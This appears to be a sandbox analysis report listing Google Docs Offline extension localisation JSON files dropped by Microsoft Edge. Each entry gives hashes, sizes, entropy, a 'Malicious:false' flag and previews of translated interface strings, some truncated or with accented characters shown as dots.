                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                Encrypted:false
